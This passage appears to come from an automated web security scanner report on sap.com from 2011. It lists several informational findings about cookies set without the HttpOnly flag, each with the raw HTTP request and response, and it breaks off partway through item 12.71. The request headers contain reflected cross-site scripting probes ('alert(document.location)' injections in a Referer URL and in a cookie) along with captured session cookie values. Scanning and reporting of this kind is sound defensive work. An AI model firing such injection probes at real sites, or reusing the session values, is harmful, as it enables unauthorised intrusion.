Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Thu, 02 Sep 2010 18:15:25 GMT
If-None-Match: "801c60d0ca4acb1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: max-age=7200
Last-Modified: Thu, 02 Sep 2010 18:15:25 GMT
Accept-Ranges: bytes
ETag: "801c60d0ca4acb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:53 GMT

12.60. http://www.sap.com/global/css/Flyouts.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/Flyouts.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/Flyouts.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Thu, 22 Apr 2010 17:57:51 GMT
If-None-Match: "80b9335345e2ca1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: max-age=7200
Last-Modified: Thu, 22 Apr 2010 17:57:51 GMT
Accept-Ranges: bytes
ETag: "80b9335345e2ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:52 GMT

12.61. http://www.sap.com/global/css/MainContentPanel.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/MainContentPanel.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/MainContentPanel.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Wed, 09 Dec 2009 15:09:18 GMT
If-None-Match: "0e3794e178ca1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: max-age=7200
Last-Modified: Wed, 09 Dec 2009 15:09:18 GMT
Accept-Ranges: bytes
ETag: "0e3794e178ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:52 GMT

12.62. http://www.sap.com/global/css/MainLeftPanel.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/MainLeftPanel.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/MainLeftPanel.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Mon, 05 Oct 2009 08:47:38 GMT
If-None-Match: "071b77d9845ca1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Mon, 05 Oct 2009 08:47:38 GMT
Accept-Ranges: bytes
ETag: "071b77d9845ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.63. http://www.sap.com/global/css/MainRightPanel.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/MainRightPanel.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/MainRightPanel.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Thu, 24 Feb 2011 19:00:34 GMT
If-None-Match: "0f55a1d55d4cb1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Thu, 24 Feb 2011 19:00:34 GMT
Accept-Ranges: bytes
ETag: "0f55a1d55d4cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.64. http://www.sap.com/global/css/dropdownlist.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/dropdownlist.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/dropdownlist.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Mon, 17 Mar 2008 11:02:06 GMT
If-None-Match: "04b66561e88c81:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: max-age=7200
Last-Modified: Mon, 17 Mar 2008 11:02:06 GMT
Accept-Ranges: bytes
ETag: "04b66561e88c81:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:52 GMT

12.65. http://www.sap.com/global/css/full_browser_pc_ie.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/css/full_browser_pc_ie.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/css/full_browser_pc_ie.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Fri, 08 Jun 2007 13:18:16 GMT
If-None-Match: "01c3279cfa9c71:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Fri, 08 Jun 2007 13:18:16 GMT
Accept-Ranges: bytes
ETag: "01c3279cfa9c71:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.66. http://www.sap.com/global/js/Validations.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/js/Validations.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/js/Validations.js HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Wed, 22 Jun 2005 08:25:16 GMT
If-None-Match: "0feedea377c51:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Wed, 22 Jun 2005 08:25:16 GMT
Accept-Ranges: bytes
ETag: "0feedea377c51:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.67. http://www.sap.com/global/js/jquery-1_3_2/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/js/jquery-1_3_2/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/js/jquery-1_3_2/jquery-1.3.2.min.js HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Mon, 18 Jan 2010 21:38:47 GMT
If-None-Match: "804d909d8698ca1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Mon, 18 Jan 2010 21:38:47 GMT
Accept-Ranges: bytes
ETag: "804d909d8698ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.68. http://www.sap.com/global/unified/css/StageHeaderMainFooter.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/unified/css/StageHeaderMainFooter.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/unified/css/StageHeaderMainFooter.css HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0b3746ad6a6=1
Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; SAP.TTC=1318688442; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407
If-Modified-Since: Wed, 15 Jun 2011 12:00:20 GMT
If-None-Match: "0227ecc532bcc1:0"
Cache-Control: max-age=0

Response

HTTP/1.1 304 Not Modified
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.59CKMMW; path=/
Cache-Control: max-age=7200
Last-Modified: Wed, 15 Jun 2011 12:00:20 GMT
Accept-Ranges: bytes
ETag: "0227ecc532bcc1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:09:40 GMT

12.69. http://www.sap.com/gwtservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservice.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservice.epx?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http://www.sapbusinessoptimizer.com/&campaigncode=CRM-US10-SGE-FRBUSOPT HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 157
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/host.epx?kNtBzmUK9zU
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:14 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:14 GMT; path=/
Set-Cookie: OriginatingURL=http://www.sapbusinessoptimizer.com/; domain=.sap.com; path=/
Set-Cookie: SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; domain=.sap.com; path=/
Set-Cookie: pmeoriginalurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmereturnurl=%2fgwtservice.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:14 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/host.epx?kNtBzmUK9zU">here</a>.</h2>
</body></html>
12.70. http://www.sap.com/gwtservices/httpBridge.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:34 GMT
Content-Length: 7669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
12.71. http://www.sap.com/gwtservices/verifylogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/verifylogin.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
